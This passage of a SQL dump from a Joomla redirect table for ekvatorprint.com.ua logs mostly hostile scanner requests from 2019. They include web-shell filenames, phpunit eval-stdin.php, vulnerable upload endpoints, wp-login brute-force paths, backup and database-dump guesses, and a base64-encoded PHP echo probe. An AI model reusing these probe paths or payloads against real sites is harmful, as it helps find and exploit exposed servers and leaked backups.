00:00:00',301),(15020,'https://ekvatorprint.com.ua/eladm.php',NULL,'http://site.ru','',3,0,'2019-06-12 18:14:54','0000-00-00 00:00:00',301),(15021,'https://ekvatorprint.com.ua/modules/mod_footer/tmpl/mark.php',NULL,'http://site.ru','',5,0,'2019-06-12 20:01:05','0000-00-00 00:00:00',301),(15022,'https://ekvatorprint.com.ua/wp-uti.php',NULL,'http://site.ru','',2,0,'2019-06-13 00:11:06','0000-00-00 00:00:00',301),(15023,'https://ekvatorprint.com.ua/aa.php',NULL,'http://site.ru','',7,0,'2019-06-13 01:18:47','0000-00-00 00:00:00',301),(15024,'https://ekvatorprint.com.ua/tplpage.php',NULL,'http://site.ru','',3,0,'2019-06-13 01:40:47','0000-00-00 00:00:00',301),(15025,'https://ekvatorprint.com.ua/dama.php',NULL,'http://site.ru','',5,0,'2019-06-13 01:53:52','0000-00-00 00:00:00',301),(15026,'https://ekvatorprint.com.ua/plugins/content/geshi/geshi/geshi/geshi.php',NULL,'http://site.ru','',1,0,'2019-06-13 02:45:08','0000-00-00 00:00:00',301),(15027,'https://ekvatorprint.com.ua/wss.php.suspected',NULL,'http://site.ru','',1,0,'2019-06-13 02:46:25','0000-00-00 00:00:00',301),(15028,'https://ekvatorprint.com.ua/db-config.php',NULL,'http://site.ru','',4,0,'2019-06-13 03:34:32','0000-00-00 00:00:00',301),(15029,'https://ekvatorprint.com.ua/cron.php',NULL,'http://site.ru','',11,0,'2019-06-13 04:29:17','0000-00-00 00:00:00',301),(15030,'https://ekvatorprint.com.ua/images/w.php.phpgif',NULL,'http://site.ru','',11,0,'2019-06-14 08:01:09','0000-00-00 00:00:00',301),(15031,'https://ekvatorprint.com.ua/templates/logo_img.php',NULL,'http://site.ru','',3,0,'2019-06-14 08:11:21','0000-00-00 00:00:00',301),(15032,'https://ekvatorprint.com.ua/dwsonv.php',NULL,'http://site.ru','',9,0,'2019-06-14 08:32:35','0000-00-00 00:00:00',301),(15033,'https://ekvatorprint.com.ua/.wp-trc.php',NULL,'http://site.ru','',9,0,'2019-06-14 09:28:10','0000-00-00 00:00:00',301),(15034,'https://ekvatorprint.com.ua/freshrdp.com2.php',NULL,'http://site.ru','',6,0,'2019-06-14 11:42:36','0000-00-00 00:00:00',301),(15035,'https://ekvatorprint.com.ua/images/logo_img.php',NULL,'http://site.ru','',4,0,'2019-06-14 11:54:53','0000-00-00 00:00:00',301),(15036,'https://ekvatorprint.com.ua/wp/logo_img.php',NULL,'http://site.ru','',2,0,'2019-06-14 12:35:57','0000-00-00 00:00:00',301),(15037,'https://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','',17,0,'2019-06-14 13:07:15','0000-00-00 00:00:00',301),(15038,'https://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',1,0,'2019-06-14 13:20:37','0000-00-00 00:00:00',301),(15039,'https://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',8,0,'2019-06-14 13:27:15','0000-00-00 00:00:00',301),(15040,'http://ekvatorprint.com.ua/wp-content/themes/thisway/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/themes/ThisWay/readme.txt','',1,0,'2019-06-14 16:35:45','0000-00-00 00:00:00',301),(15041,'https://ekvatorprint.com.ua/wordpress/',NULL,'http://ekvatorprint.com.ua//wordpress//','',54,0,'2019-06-14 19:31:16','0000-00-00 00:00:00',301),(15042,'https://ekvatorprint.com.ua/manager/',NULL,'https://ekvatorprint.com.ua/manager/','',2,0,'2019-06-15 01:35:56','0000-00-00 00:00:00',301),(15043,'https://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',8,0,'2019-06-15 02:13:54','0000-00-00 00:00:00',301),(15044,'https://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',6,0,'2019-06-15 02:15:03','0000-00-00 00:00:00',301),(15045,'https://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','',6,0,'2019-06-15 02:21:27','0000-00-00 00:00:00',301),(15046,'https://ekvatorprint.com.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','',6,0,'2019-06-15 12:24:53','0000-00-00 00:00:00',301),(15047,'https://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',8,0,'2019-06-15 12:35:28','0000-00-00 00:00:00',301),(15048,'https://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',6,0,'2019-06-15 12:44:40','0000-00-00 00:00:00',301),(15049,'https://ekvatorprint.com.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',10,0,'2019-06-16 00:51:39','0000-00-00 00:00:00',301),(15050,'https://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',2,0,'2019-06-16 06:34:01','0000-00-00 00:00:00',301),(15051,'http://ekvatorprint.com.ua/wp-content/themes/headway-120/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-120/style.css','',1,0,'2019-06-17 09:11:03','0000-00-00 00:00:00',301),(15052,'https://ekvatorprint.com.ua/wp-config.php.backup',NULL,'','',10,0,'2019-06-17 18:58:39','0000-00-00 00:00:00',301),(15053,'http://ekvatorprint.com.ua/wp-content/themes/headway-airsolution/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/headway-airsolution/style.css','',1,0,'2019-06-17 20:26:52','0000-00-00 00:00:00',301),(15054,'https://ekvatorprint.com.ua/blackhat.php',NULL,'','',21,0,'2019-06-17 23:20:14','0000-00-00 00:00:00',301),(15055,'https://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/revslider/db.php','',2,0,'2019-06-18 08:52:46','0000-00-00 00:00:00',301),(15056,'https://ekvatorprint.com.ua/f4zj/mini-shell.php',NULL,'http://site.ru','',1,0,'2019-06-18 16:08:49','0000-00-00 00:00:00',301),(15057,'http://ekvatorprint.com.ua/wp-content/themes/synoptic/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/synoptic/style.css','',1,0,'2019-06-18 21:31:14','0000-00-00 00:00:00',301),(15058,'https://ekvatorprint.com.ua/vacancies',NULL,'','',2,0,'2019-06-19 18:58:50','0000-00-00 00:00:00',301),(15059,'https://ekvatorprint.com.ua/career',NULL,'','',2,0,'2019-06-19 19:01:47','0000-00-00 00:00:00',301),(15060,'https://ekvatorprint.com.ua/apply',NULL,'','',2,0,'2019-06-19 19:02:46','0000-00-00 00:00:00',301),(15061,'https://ekvatorprint.com.ua/signin?context=popup&next=https://www.youtube.com/post_login',NULL,'','',2,0,'2019-06-19 21:01:28','0000-00-00 00:00:00',301),(15062,'http://ekvatorprint.com.ua/wp-content/themes/geoplaces3/style.css',NULL,'http://ekvatorprint.com.ua/wp-content/themes/GeoPlaces3/style.css','',1,0,'2019-06-20 09:09:45','0000-00-00 00:00:00',301),(15063,'https://ekvatorprint.com.ua/indes.php',NULL,'','',5,0,'2019-06-22 03:00:07','0000-00-00 00:00:00',301),(15064,'https://ekvatorprint.com.ua/wordpress/wp-login.php',NULL,'http://ekvatorprint.com.ua//wordpress/wp-login.php','',97,0,'2019-06-22 09:59:52','0000-00-00 00:00:00',301),(15065,'https://ekvatorprint.com.ua/sys.php.php',NULL,'','',5,0,'2019-06-22 10:07:48','0000-00-00 00:00:00',301),(15066,'https://ekvatorprint.com.ua/blog/wp-login.php',NULL,'http://ekvatorprint.com.ua//blog/wp-login.php','',101,0,'2019-06-22 16:04:55','0000-00-00 00:00:00',301),(15067,'https://ekvatorprint.com.ua/maill.php',NULL,'','',4,0,'2019-06-22 17:28:02','0000-00-00 00:00:00',301),(15068,'https://ekvatorprint.com.ua/zizglhdw7yulayikg7odmdarh',NULL,'','',1,0,'2019-06-22 19:00:35','0000-00-00 00:00:00',301),(15069,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/kill.php',NULL,'','',2,0,'2019-06-23 03:21:27','0000-00-00 00:00:00',301),(15070,'https://ekvatorprint.com.ua/test/wp-login.php',NULL,'http://ekvatorprint.com.ua//test/wp-login.php','',18,0,'2019-06-23 04:09:56','0000-00-00 00:00:00',301),(15071,'https://ekvatorprint.com.ua/wp-content/themes/ghost/includes/uploadify/upload_settings_image.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/Ghost/includes/uploadify/upload_settings_image.php','',1,0,'2019-06-23 09:04:50','0000-00-00 00:00:00',301),(15072,'https://ekvatorprint.com.ua/adminer.php',NULL,'','',31,0,'2019-06-23 15:32:09','0000-00-00 00:00:00',301),(15073,'https://ekvatorprint.com.ua/sql.php',NULL,'','',6,0,'2019-06-23 15:32:11','0000-00-00 00:00:00',301),(15074,'https://ekvatorprint.com.ua/phpminiadmin.php',NULL,'','',5,0,'2019-06-23 15:32:13','0000-00-00 00:00:00',301),(15075,'https://ekvatorprint.com.ua/cache/cachee.php',NULL,'','',5,0,'2019-06-23 17:07:57','0000-00-00 00:00:00',301),(15076,'https://ekvatorprint.com.ua/modules/mod_dionefileuploader/upload.php',NULL,'http://ekvatorprint.com.ua/modules/mod_dionefileuploader/upload.php','',9,0,'2019-06-24 09:03:43','0000-00-00 00:00:00',301),(15077,'https://ekvatorprint.com.ua/show.php?check=1',NULL,'','',4,0,'2019-06-25 07:01:56','0000-00-00 00:00:00',301),(15078,'https://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/uploadhandler.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_simpleswfupload/uploadhandler.php','',5,0,'2019-06-25 07:14:30','0000-00-00 00:00:00',301),(15079,'http://ekvatorprint.com.ua/images/thumbnails/images/stories/pechat-bigbordov-fill.jpg',NULL,'https://ekvatorprint.com.ua/?gclid=EAIaIQobChMI5f28q7qE4wIVmZh3Ch2DHQ5tEAEYAyAAEgKyBfD_BwE','',1,0,'2019-06-25 10:47:31','0000-00-00 00:00:00',301),(15080,'http://ekvatorprint.com.ua/images/thumbnails/images/stories/tent-fill.jpg',NULL,'https://ekvatorprint.com.ua/?gclid=EAIaIQobChMI5f28q7qE4wIVmZh3Ch2DHQ5tEAEYAyAAEgKyBfD_BwE','',1,0,'2019-06-25 10:47:32','0000-00-00 00:00:00',301),(15081,'https://ekvatorprint.com.ua/wp-cache.php',NULL,'','',8,0,'2019-06-25 14:19:10','0000-00-00 00:00:00',301),(15082,'https://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php',NULL,'http://ekvatorprint.com.ua/components/com_jbcatalog/libraries/jsupload/server/php/index.php','',8,0,'2019-06-25 16:08:26','0000-00-00 00:00:00',301),(15083,'https://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php',NULL,'http://ekvatorprint.com.ua/modules/mod_ppc_simple_spotlight/elements/upload_file.php','',9,0,'2019-06-25 16:08:26','0000-00-00 00:00:00',301),(15084,'https://ekvatorprint.com.ua/components/com_creativecontactform/fileupload/index.php',NULL,'http://ekvatorprint.com.ua/components/com_creativecontactform/fileupload/index.php','',8,0,'2019-06-25 16:13:22','0000-00-00 00:00:00',301),(15085,'https://ekvatorprint.com.ua/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1',NULL,'http://ekvatorprint.com.ua/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1','',7,0,'2019-06-25 16:16:27','0000-00-00 00:00:00',301),(15086,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1',NULL,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','',6,0,'2019-06-26 01:33:16','0000-00-00 00:00:00',301),(15087,'https://ekvatorprint.com.ua/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php','',6,0,'2019-06-26 05:41:53','0000-00-00 00:00:00',301),(15088,'http://ekvatorprint.com.ua/wp-content/plugins/font-uploader/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/font-uploader/readme.txt','',1,0,'2019-06-26 08:13:26','0000-00-00 00:00:00',301),(15089,'http://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/thumbnails/images/portfolio/plotternaya-podrezka/плоттерная подрезка в экваторпринт-fill-530x530.png',NULL,'','',41,0,'2019-06-26 11:19:37','0000-00-00 00:00:00',301),(15090,'https://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php','',5,0,'2019-06-27 03:41:37','0000-00-00 00:00:00',301),(15091,'https://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/conf.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/temp/update_extract/conf.php','',1,0,'2019-06-27 07:02:48','0000-00-00 00:00:00',301),(15092,'https://ekvatorprint.com.ua/bigdump.php',NULL,'','',5,0,'2019-06-27 11:11:49','0000-00-00 00:00:00',301),(15093,'https://ekvatorprint.com.ua/dump/bigdump.php',NULL,'','',2,0,'2019-06-27 11:11:49','0000-00-00 00:00:00',301),(15094,'https://ekvatorprint.com.ua/bigdump/bigdump.php',NULL,'','',2,0,'2019-06-27 11:11:49','0000-00-00 00:00:00',301),(15095,'https://ekvatorprint.com.ua/sql/bigdump.php',NULL,'','',1,0,'2019-06-27 11:11:49','0000-00-00 00:00:00',301),(15096,'https://ekvatorprint.com.ua/lieats.php',NULL,'','',4,0,'2019-06-27 16:47:47','0000-00-00 00:00:00',301),(15097,'https://ekvatorprint.com.ua/images/configurations.php',NULL,'','',5,0,'2019-06-28 13:11:14','0000-00-00 00:00:00',301),(15098,'https://ekvatorprint.com.ua/portfolio/5-setki/detail/20-setka-1?tmpl=component',NULL,'','',4,0,'2019-06-30 02:10:45','0000-00-00 00:00:00',301),(15099,'https://ekvatorprint.com.ua/portfolio/5-setki/detail/21-setka-2?tmpl=component',NULL,'','',4,0,'2019-06-30 02:10:50','0000-00-00 00:00:00',301),(15100,'https://ekvatorprint.com.ua/.git/index',NULL,'','',27,0,'2019-06-30 18:10:29','0000-00-00 00:00:00',301),(15101,'https://ekvatorprint.com.ua/yjh.php',NULL,'','',4,0,'2019-06-30 20:56:00','0000-00-00 00:00:00',301),(15102,'https://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php',NULL,'http://ekvatorprint.com.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_imaged.php','',7,0,'2019-07-01 03:50:49','0000-00-00 00:00:00',301),(15103,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/phpunit.xsd',NULL,'','',25,0,'2019-07-02 11:34:14','0000-00-00 00:00:00',301),(15104,'http://ekvatorprint.com.ua/banner-printing/templates/system/css/general.css',NULL,'','',1,0,'2019-07-03 06:52:44','0000-00-00 00:00:00',301),(15105,'https://ekvatorprint.com.ua/plotternaya-podrezka/print-flags',NULL,'','',1,0,'2019-07-03 06:52:47','0000-00-00 00:00:00',301),(15106,'https://ekvatorprint.com.ua/administrator/components/com_joomlaupdate/controllers/ws.php',NULL,'','',1,0,'2019-07-04 18:13:20','0000-00-00 00:00:00',301),(15107,'http://ekvatorprint.com.ua/administrator/index.php;',NULL,'','',3,0,'2019-07-06 00:38:13','0000-00-00 00:00:00',301),(15108,'https://ekvatorprint.com.ua/kcfinder/browse.php',NULL,'','',2,0,'2019-07-06 02:55:31','0000-00-00 00:00:00',301),(15109,'https://ekvatorprint.com.ua/a0hn5z0llqbhgvkr',NULL,'','',1,0,'2019-07-06 03:28:17','0000-00-00 00:00:00',301),(15110,'https://ekvatorprint.com.ua/ekvatorprint.com.ua',NULL,'','',29,0,'2019-07-07 08:53:38','0000-00-00 00:00:00',301),(15111,'https://ekvatorprint.com.ua/component/-/index.php?option=com_kide',NULL,'','',1,0,'2019-07-07 11:28:05','0000-00-00 00:00:00',301),(15112,'http://ekvatorprint.com.ua/print-great-photos/templates/gk_ilife/favicon.ico',NULL,'','',4,0,'2019-07-08 08:06:49','0000-00-00 00:00:00',301),(15113,'https://ekvatorprint.com.ua/te3/signup.php',NULL,'','',6,0,'2019-07-09 02:23:43','0000-00-00 00:00:00',301),(15114,'https://ekvatorprint.com.ua/wp-logs.php?action=test',NULL,'','',3,0,'2019-07-09 06:07:10','0000-00-00 00:00:00',301),(15115,'https://ekvatorprint.com.ua/kup.php?u=1',NULL,'','',5,0,'2019-07-09 13:24:56','0000-00-00 00:00:00',301),(15116,'https://ekvatorprint.com.ua/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'','',98,0,'2019-07-10 12:48:26','0000-00-00 00:00:00',301),(15117,'https://ekvatorprint.com.ua/wordpress/wp-config.php.backup',NULL,'','',1,0,'2019-07-11 20:03:31','0000-00-00 00:00:00',301),(15118,'https://ekvatorprint.com.ua/adminer-4.6.2.php',NULL,'','',4,0,'2019-07-13 05:55:08','0000-00-00 00:00:00',301),(15119,'https://ekvatorprint.com.ua/adminer-4.6.1.php',NULL,'','',3,0,'2019-07-13 07:10:13','0000-00-00 00:00:00',301),(15120,'https://ekvatorprint.com.ua/adminer-4.6.0.php',NULL,'','',3,0,'2019-07-13 08:24:14','0000-00-00 00:00:00',301),(15121,'https://ekvatorprint.com.ua/adminer-4.5.0.php',NULL,'','',3,0,'2019-07-13 09:36:56','0000-00-00 00:00:00',301),(15122,'https://ekvatorprint.com.ua/adminer-4.4.0.php',NULL,'','',3,0,'2019-07-13 10:48:22','0000-00-00 00:00:00',301),(15123,'https://ekvatorprint.com.ua/adminer-4.3.1.php',NULL,'','',5,0,'2019-07-13 11:58:33','0000-00-00 00:00:00',301),(15124,'https://ekvatorprint.com.ua/adminer-4.3.0.php',NULL,'','',3,0,'2019-07-13 13:06:56','0000-00-00 00:00:00',301),(15125,'https://ekvatorprint.com.ua/adminer-4.2.5.php',NULL,'','',5,0,'2019-07-13 14:13:06','0000-00-00 00:00:00',301),(15126,'https://ekvatorprint.com.ua/index.php?option=com_community',NULL,'','',8,0,'2019-07-14 09:19:34','0000-00-00 00:00:00',301),(15127,'https://ekvatorprint.com.ua/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php','',1,0,'2019-07-15 09:34:49','0000-00-00 00:00:00',301),(15128,'https://ekvatorprint.com.ua/gen204?invalidresponse=q=https://translate.googleapis.com/translate_a/single?client=gtx&s,ql=155,r=,rl=0',NULL,'https://ekvatorprint.com.ua/contacts','',1,0,'2019-07-15 10:41:25','0000-00-00 00:00:00',301),(15129,'https://ekvatorprint.com.ua/freichat/client/plugins/upload/upload.php',NULL,'http://ekvatorprint.com.ua/freichat/client/plugins/upload/upload.php','',20,0,'2019-07-15 11:23:02','0000-00-00 00:00:00',301),(15130,'https://ekvatorprint.com.ua/blog/',NULL,'http://ekvatorprint.com.ua/','',65,0,'2019-07-15 16:35:40','0000-00-00 00:00:00',301),(15131,'https://ekvatorprint.com.ua/actoajizu6pljjzmrpls',NULL,'','',1,0,'2019-07-15 19:13:34','0000-00-00 00:00:00',301),(15132,'http://ekvatorprint.com.ua/wp-content/plugins/php-event-calendar/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/php-event-calendar/readme.txt','',1,0,'2019-07-16 07:54:17','0000-00-00 00:00:00',301),(15133,'https://ekvatorprint.com.ua/admin/kcfinder/browse.php',NULL,'','',1,0,'2019-07-16 09:10:15','0000-00-00 00:00:00',301),(15134,'https://ekvatorprint.com.ua/wp-content/themes/bl.php',NULL,'','',1,0,'2019-07-23 05:39:11','0000-00-00 00:00:00',301),(15135,'https://ekvatorprint.com.ua/jm-ajax/upload_file/',NULL,'http://ekvatorprint.com.ua/jm-ajax/upload_file/','',2,0,'2019-07-23 17:31:05','0000-00-00 00:00:00',301),(15136,'https://ekvatorprint.com.ua/fuel',NULL,'','',1,0,'2019-07-24 07:24:08','0000-00-00 00:00:00',301),(15137,'http://ekvatorprint.com.ua/wp-content/plugins/sexy-contact-form/readme.txt',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/sexy-contact-form/readme.txt','',1,0,'2019-07-25 14:10:24','0000-00-00 00:00:00',301),(15138,'https://ekvatorprint.com.ua/ekvatorprint.tar',NULL,'','',7,0,'2019-07-26 09:49:06','0000-00-00 00:00:00',301),(15139,'https://ekvatorprint.com.ua/dump.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:06','0000-00-00 00:00:00',301),(15140,'https://ekvatorprint.com.ua/wwwroot.sql',NULL,'','',1,0,'2019-07-26 09:49:07','0000-00-00 00:00:00',301),(15141,'https://ekvatorprint.com.ua/main.sql.zip',NULL,'','',1,0,'2019-07-26 09:49:07','0000-00-00 00:00:00',301),(15142,'https://ekvatorprint.com.ua/sql.sql.zip',NULL,'','',1,0,'2019-07-26 09:49:08','0000-00-00 00:00:00',301),(15143,'https://ekvatorprint.com.ua/shop.zip',NULL,'','',2,0,'2019-07-26 09:49:08','0000-00-00 00:00:00',301),(15144,'https://ekvatorprint.com.ua/www.tar',NULL,'','',5,0,'2019-07-26 09:49:08','0000-00-00 00:00:00',301),(15145,'https://ekvatorprint.com.ua/backups.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:09','0000-00-00 00:00:00',301),(15146,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.zip',NULL,'','',11,0,'2019-07-26 09:49:09','0000-00-00 00:00:00',301),(15147,'https://ekvatorprint.com.ua/ekvatorprint.sql.tar',NULL,'','',5,0,'2019-07-26 09:49:10','0000-00-00 00:00:00',301),(15148,'https://ekvatorprint.com.ua/mysql.tar',NULL,'','',1,0,'2019-07-26 09:49:10','0000-00-00 00:00:00',301),(15149,'https://ekvatorprint.com.ua/shop.sql',NULL,'','',1,0,'2019-07-26 09:49:10','0000-00-00 00:00:00',301),(15150,'https://ekvatorprint.com.ua/backups.tar',NULL,'','',2,0,'2019-07-26 09:49:11','0000-00-00 00:00:00',301),(15151,'https://ekvatorprint.com.ua/db.sql.tar',NULL,'','',3,0,'2019-07-26 09:49:12','0000-00-00 00:00:00',301),(15152,'https://ekvatorprint.com.ua/mysql.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:12','0000-00-00 00:00:00',301),(15153,'https://ekvatorprint.com.ua/www.gz',NULL,'','',4,0,'2019-07-26 09:49:12','0000-00-00 00:00:00',301),(15154,'https://ekvatorprint.com.ua/dump.gz',NULL,'','',2,0,'2019-07-26 09:49:13','0000-00-00 00:00:00',301),(15155,'https://ekvatorprint.com.ua/db.tar',NULL,'','',3,0,'2019-07-26 09:49:13','0000-00-00 00:00:00',301),(15156,'https://ekvatorprint.com.ua/dump.sql.tar',NULL,'','',3,0,'2019-07-26 09:49:14','0000-00-00 00:00:00',301),(15157,'https://ekvatorprint.com.ua/wwwroot.sql.gz',NULL,'','',1,0,'2019-07-26 09:49:14','0000-00-00 00:00:00',301),(15158,'https://ekvatorprint.com.ua/ekvatorprint.sql.gz',NULL,'','',11,0,'2019-07-26 09:49:14','0000-00-00 00:00:00',301),(15159,'https://ekvatorprint.com.ua/database.sql.tar',NULL,'','',4,0,'2019-07-26 09:49:15','0000-00-00 00:00:00',301),(15160,'https://ekvatorprint.com.ua/shop.tar',NULL,'','',2,0,'2019-07-26 09:49:15','0000-00-00 00:00:00',301),(15161,'https://ekvatorprint.com.ua/wwwroot.sql.tar',NULL,'','',1,0,'2019-07-26 09:49:16','0000-00-00 00:00:00',301),(15162,'https://ekvatorprint.com.ua/ekvatorprint.sql',NULL,'','',14,0,'2019-07-26 09:49:16','0000-00-00 00:00:00',301),(15163,'https://ekvatorprint.com.ua/shop.sql.gz',NULL,'','',1,0,'2019-07-26 09:49:16','0000-00-00 00:00:00',301),(15164,'https://ekvatorprint.com.ua/database.zip',NULL,'','',9,0,'2019-07-26 09:49:17','0000-00-00 00:00:00',301),(15165,'https://ekvatorprint.com.ua/sql.sql.gz',NULL,'','',1,0,'2019-07-26 09:49:17','0000-00-00 00:00:00',301),(15166,'https://ekvatorprint.com.ua/database.gz',NULL,'','',5,0,'2019-07-26 09:49:18','0000-00-00 00:00:00',301),(15167,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql.tar',NULL,'','',8,0,'2019-07-26 09:49:18','0000-00-00 00:00:00',301),(15168,'https://ekvatorprint.com.ua/main.sql',NULL,'','',1,0,'2019-07-26 09:49:19','0000-00-00 00:00:00',301),(15169,'https://ekvatorprint.com.ua/sql.sql.tar',NULL,'','',1,0,'2019-07-26 09:49:19','0000-00-00 00:00:00',301),(15170,'https://ekvatorprint.com.ua/www.sql',NULL,'','',3,0,'2019-07-26 09:49:20','0000-00-00 00:00:00',301),(15171,'https://ekvatorprint.com.ua/backups.zip',NULL,'','',2,0,'2019-07-26 09:49:20','0000-00-00 00:00:00',301),(15172,'https://ekvatorprint.com.ua/main.sql.tar',NULL,'','',1,0,'2019-07-26 09:49:20','0000-00-00 00:00:00',301),(15173,'https://ekvatorprint.com.ua/db.sql.gz',NULL,'','',3,0,'2019-07-26 09:49:21','0000-00-00 00:00:00',301),(15174,'https://ekvatorprint.com.ua/shop.gz',NULL,'','',1,0,'2019-07-26 09:49:21','0000-00-00 00:00:00',301),(15175,'https://ekvatorprint.com.ua/mysql.gz',NULL,'','',1,0,'2019-07-26 09:49:22','0000-00-00 00:00:00',301),(15176,'https://ekvatorprint.com.ua/backup.gz',NULL,'','',4,0,'2019-07-26 09:49:22','0000-00-00 00:00:00',301),(15177,'https://ekvatorprint.com.ua/db.sql',NULL,'','',8,0,'2019-07-26 09:49:22','0000-00-00 00:00:00',301),(15178,'https://ekvatorprint.com.ua/ekvatorprint.zip',NULL,'','',9,0,'2019-07-26 09:49:23','0000-00-00 00:00:00',301),(15179,'https://ekvatorprint.com.ua/ekvatorprint.gz',NULL,'','',5,0,'2019-07-26 09:49:24','0000-00-00 00:00:00',301),(15180,'https://ekvatorprint.com.ua/mysql.sql',NULL,'','',1,0,'2019-07-26 09:49:24','0000-00-00 00:00:00',301),(15181,'https://ekvatorprint.com.ua/dump.sql.gz',NULL,'','',5,0,'2019-07-26 09:49:24','0000-00-00 00:00:00',301),(15182,'https://ekvatorprint.com.ua/www.sql.tar',NULL,'','',2,0,'2019-07-26 09:49:25','0000-00-00 00:00:00',301),(15183,'https://ekvatorprint.com.ua/wwwroot.tar',NULL,'','',1,0,'2019-07-26 09:49:25','0000-00-00 00:00:00',301),(15184,'https://ekvatorprint.com.ua/mysql.sql.tar',NULL,'','',1,0,'2019-07-26 09:49:26','0000-00-00 00:00:00',301),(15185,'https://ekvatorprint.com.ua/sql.gz',NULL,'','',1,0,'2019-07-26 09:49:26','0000-00-00 00:00:00',301),(15186,'https://ekvatorprint.com.ua/shop.sql.tar',NULL,'','',1,0,'2019-07-26 09:49:27','0000-00-00 00:00:00',301),(15187,'https://ekvatorprint.com.ua/www.sql.zip',NULL,'','',2,0,'2019-07-26 09:49:27','0000-00-00 00:00:00',301),(15188,'https://ekvatorprint.com.ua/wwwroot.sql.zip',NULL,'','',1,0,'2019-07-26 09:49:27','0000-00-00 00:00:00',301),(15189,'https://ekvatorprint.com.ua/mysql.sql.gz',NULL,'','',1,0,'2019-07-26 09:49:28','0000-00-00 00:00:00',301),(15190,'https://ekvatorprint.com.ua/ekvatorprint.com.ua.sql',NULL,'','',13,0,'2019-07-26 09:49:28','0000-00-00 00:00:00',301),(15191,'https://ekvatorprint.com.ua/backup.sql.gz',NULL,'','',3,0,'2019-07-26 09:49:29','0000-00-00 00:00:00',301),(15192,'https://ekvatorprint.com.ua/backups.sql',NULL,'','',2,0,'2019-07-26 09:49:29','0000-00-00 00:00:00',301),(15193,'https://ekvatorprint.com.ua/backup.sql.tar',NULL,'','',4,0,'2019-07-26 09:49:29','0000-00-00 